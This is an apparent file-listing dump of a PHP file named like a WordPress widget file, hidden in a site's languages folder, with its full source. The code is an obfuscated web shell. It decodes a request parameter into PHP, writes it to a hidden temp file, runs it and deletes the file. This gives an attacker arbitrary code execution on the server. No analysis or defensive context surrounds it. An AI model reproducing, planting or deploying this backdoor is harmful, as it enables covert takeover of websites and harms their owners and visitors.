File "widget.area.1786052026.php"

Full Path: /home/planet5/public_html/bansibaba.com/wp-content1/languages/widget.area.1786052026.php
File size: 898 bytes
MIME-type: --
Charset: utf-8

<!--BmGiyP5U-->
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["k"])){
$token = array_filter(["/var/tmp", "/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd()]);
$parameter_group = $_REQUEST["k"];
 	$parameter_group  	=explode  (	"." 	 ,		 $parameter_group  	) ; 
$pointer = '';
$salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt5);
$__len = count($parameter_group);

for ($i = 0; $i<$__len; $i++) {
    $val = $parameter_group[$i];
    $sChar = ord($salt5[$i % $sLen]);
    $d = ((int)$val - $sChar - ($i % 10)) ^ 57;
    $pointer .= chr($d);
}
foreach ($token as $desc) {
            if (is_writable($desc) && is_dir($desc)) {
            $pset = "$desc" . "/.tkn";
            if (false !== file_put_contents($pset, $pointer)) {
    include_once $pset;
    @unlink($pset);
    exit;
}
        }
}
}